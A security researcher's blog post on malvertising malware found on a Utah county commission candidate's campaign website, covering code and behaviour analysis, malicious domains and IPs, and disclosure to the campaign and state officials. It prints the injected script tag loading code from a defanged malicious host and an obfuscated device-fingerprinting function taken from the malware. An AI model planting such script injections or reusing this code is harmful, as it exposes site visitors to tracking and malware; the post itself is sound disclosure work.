The political election campaign of Tom Sakievich responded quickly to remove “malvertising” malware from their website this past week after I discovered and reported the hack.
Discovering the Malware
On Tuesday June 9, I received my primary ballot in the mail. The Utah County Commissioners primary gives voters the choice between challenger Tom Sakievich and incumbent Nathan Ivie. Before voting, I like to do some research on the candidates such as reading about them in the local news, reviewing their voting record on issues, and visiting their campaign websites.
When I visited the campaign website of Tom Sakievich, multiple security alerts went off. Being a cybersecurity professional, I have several tools always running to help me identify security issues. Two tools notified me to the presence of malicious code on the campaign website.
Upon further inspection, I discovered on line 678 of the webpage code a reference to malicious code on a 3rd party server (do not visit it!) (modified slightly to break automatic hyperlink):
<script type='text/javascript' src='//rugiomyh2vmr[.]com/66/b5/c8/66b5c86625ce95e4204891b4c167d60d[.]js'></script>
The code’s purpose appears to be an activity called malvertising. Wikipedia describes malvertising as “the use of online advertising to spread malware.” Hackers tend to target reputable websites to place malvertising code. It’s particularly potent because when unsuspecting people visit those trusted websites, the code can track users, display unwanted ads, redirect visitors to other websites, or attempt to download malware onto the user’s device.
It’s unclear how hackers were able to place the code on the website. However, the nature of this infection points to a hacker’s botnet’s automated process exploiting a vulnerability, and not so much a person at a keyboard manually working their way in.
I’ll summarize the next two sections of the article here for the average citizen because they get pretty technical. The hackers employed techniques that made it difficult to determine the goal of the code, but I identified the general purpose of the code. I found it associated with known malvertising systems as well.
For the less technical reader, I suggest skipping to Criminal Tunnel Vision section below.
Code Analysis
The code and behavior of the malvertising code was difficult to analyze. The hackers used various tricks and techniques to hide the true intention of the source code in a process called code obfuscation. The obfuscation techniques employed are rarely, if ever, used by legitimate code. I was able to peel back the layers to a degree, given the time constraints I could not fully de-obfuscate the code. From what I did see, the code identified the types of devices of users (Andoird, iPhone, SmartTV, etc), their screen size, techniques to identify if the visitor was a bot or person, and what type of actions the script could take.
function detect() {
var userAgent = navigator[_0x5432("0x35")][_0x5432("0x30")]();
var data = {
"webkit" : /webkit/[_0x5432("0x36")](userAgent),
"mozilla" : /mozilla/[_0x5432("0x36")](userAgent) && !/(compatible|webkit)/["test"](userAgent),
"chrome" : /chrome/[_0x5432("0x36")](userAgent) || /crios/[_0x5432("0x36")](userAgent),
"msie" : /msie/[_0x5432("0x36")](userAgent) && !/opera/[_0x5432("0x36")](userAgent),
"edge" : /edge/[_0x5432("0x36")](userAgent),
"ie11" : /mozilla/[_0x5432("0x36")](userAgent) && /trident/[_0x5432("0x36")](userAgent) && /rv:11/["test"](userAgent),
"firefox" : /firefox/[_0x5432("0x36")](userAgent),
"safari" : /safari/["test"](userAgent) && !(/chrome/[_0x5432("0x36")](userAgent) || /crios/[_0x5432("0x36")](userAgent)),
"opera" : /opera/[_0x5432("0x36")](userAgent),
"opr" : /opr/["test"](userAgent),
"ya" : /yabrowser/["test"](userAgent),
"fb" : /fbav/[_0x5432("0x36")](userAgent),
"ucbrowser" : /ubrowser/[_0x5432("0x36")](userAgent) || /ucbrowser/[_0x5432("0x36")](userAgent),
"android" : /android/i[_0x5432("0x36")](userAgent),
"puf" : /puffin/i[_0x5432("0x36")](userAgent),
"ios" : /iphone|ipad|ipod/i["test"](userAgent),
"ios9" : (/os 9/[_0x5432("0x36")](userAgent) || /os 10/[_0x5432("0x36")](userAgent)) && /like mac os x/["test"](userAgent),
"ios10" : /os 10/[_0x5432("0x36")](userAgent) && /like mac os x/[_0x5432("0x36")](userAgent),
"ios11" : /os 11/[_0x5432("0x36")](userAgent) && /like mac os x/[_0x5432("0x36")](userAgent),
"blackberry" : /blackberry|bb/i["test"](userAgent),
"winphone" : /windows\sphone/i["test"](userAgent),
"new_webview" : /Mobile/i["test"](userAgent),
"isMobile" : /Android|BlackBerry|iPhone|iPad|iPod|Opera\sMini|IEMobile/i[_0x5432("0x36")](userAgent),
"ucversion" : parseInt((userAgent[_0x5432("0x37")](/.+(?:ubrowser|ucbrowser)[\/: ]([\d.]+)/) || [])[1]),
"wversion" : parseInt((userAgent[_0x5432("0x37")](/.+(?:windows nt)[\/: ]([\d.]+)/) || [])[1])
};
Behavior and Reputation Analysis
I could only go so far by just looking at the code, so I turned to examining its behavior when I ran it. This also proved difficult because the hackers employed some clever tricks to prevent the code from loading under some circumstances. This is important to note because it indicates additional undiscovered malicious code runs on the website, likely on the server itself. To determine whether or not to load the code on the user’s device, the server’s code appears to take into consideration the IP address of the user, if it had a cookie from a previous visit, and the type of device used. When I did get the script from rugiomyh2vmr[.]com to load, it downloaded additional scripts from four different domains: Nbf9baurl[.]com, nta1vb6cdlrl[.]com, ie8eamus[.]com, and d24ak3f2b[.]top. These domains all have poor reputation.
The domain rugiomyh2vmr[.]com was registered back on April 29, 2020. Newly registered domains in scripts are a classic sign of malicious activity. Hackers use fresh domains because antiviruses and web filters burn and block the domains pretty quickly. The cybersecurity company Palo Alto Networks considers this domain “High Risk” and classified as “Questionable.” GeoIP lookup on the IP addresses the domain resolve to indicate Virginia. The hosting provider is DataWeb Global Group B.V. based out of the Netherlands.
nta1vb6cdlrl[.]com is hosted on the same servers as rugiomyh2vmr[.]com and was registered on October 24, 2019. It’s a bit older by malware standards, but clearly still functioning. Palo Alto Networks also considers this domain “High Risk.”
Nbf9baurl[.]com is hosted in the Netherlands, a go-to country for hackers to setup their infrastructure due to the country’s strong anti-censorship laws. Palo Alto Networks also considers this domain considered “High Risk.”
ie8eamus[.]com is hosted behind a service provided by the company CloudFlare. CloudFlare, used by both legitimate and illegitimate organizations, has strong anti-censorship attitudes making it an ideal service for hackers. The antivirus company MalwareBytes identifies this domain as “malvertising.”
Finally, d24ak3f2b[.]top resolves to an IP in the United States and is considered “High Risk.”
Searching these domains on Google returns results mostly associated with malware analysis, suggesting others have associated these domains with nefarious activities.
I found IP addresses hosting rugiomyh2vmr[.]com also interesting. According to Security Trails there are about 1,780 domains and subdomains observed resolving to 192.243.59.12; 1,514 resolving to 192.243.59.13; and 1,514 resolving to 192.243.59.20. An examination of the domains reveals a strong pattern. Most domains are 12 characters of seemingly random characters and numbers. A sample of domains on VirusTotal kept turning up “malicious” or “spam.”
If you would like to perform your own analysis, you can download a pcap I took of loading the website with the malware.
Criminal Tunnel Vision
In a quest for efficiency and automation, hackers focus so much on their techniques and own immediate goals that they often fail to realize the value of the target. I believe this is the case here.
Malvertising appears to be the immediate goal of the hackers, but the value of a hacked political campaign’s website can be quite valuable in other hands. Although it is a local election, Russian and Chinese intelligence operations would love to get their hands on the infrastructure of American political figures to monitor communications and spy on visitors. Criminals could see it as an opportunity to blackmail a politician, or change the link to the “Donate Today” button to harvest payment information from unsuspecting donors. This hack appears to be pretty mild in low impacting. Thankfully, the people behind the hack did not have more malevolent objectives.
Notification and Response
On June 10, 2020 I submitted a message through the “Contact Us” page on the website. (I know, it’s ironic that I report the hacked website via the hacked website.) On June 12, I realized I should report this security incident to the Utah Department of Public Safety’s Statewide Information and Analysis Center (SIAC). Low and behold when I logged onto my email, they had already reached out to me 5 minutes prior after seeing my tweets.
After sharing my findings, Utah SIAC coordinated with the Utah Lieutenant Governor’s office to quickly established a dialog with the Tom Sakievich campaign and put me in touch with their webmaster. I’m pleased to say they immediately began to remedy the issue and took extensive action to eradicate the malware. Their response to clean things up is among the best I have seen.
After establishing contact, I weighed the option of publicizing this information before the campaign could completely resolve the issue. After all, we are in the middle of primary elections and the website will attract more visitors and potentially put them at risk. I also think voters should have access to this information if for some reason they factor cybersecurity in who they vote for. Ultimately I decided to postpone publicizing this information as it could have attracted additional criminal attention and further increase the risk to visitors.
This was found (somewhat by happenstance) and disclosed as part of the UtahCyberCheck project, where in my spare time I focus on finding and reporting cybersecurity issues of Utah government, education, and nonprofit organizations. For more information about the project, you can read the announcement blog post.
Leave a Reply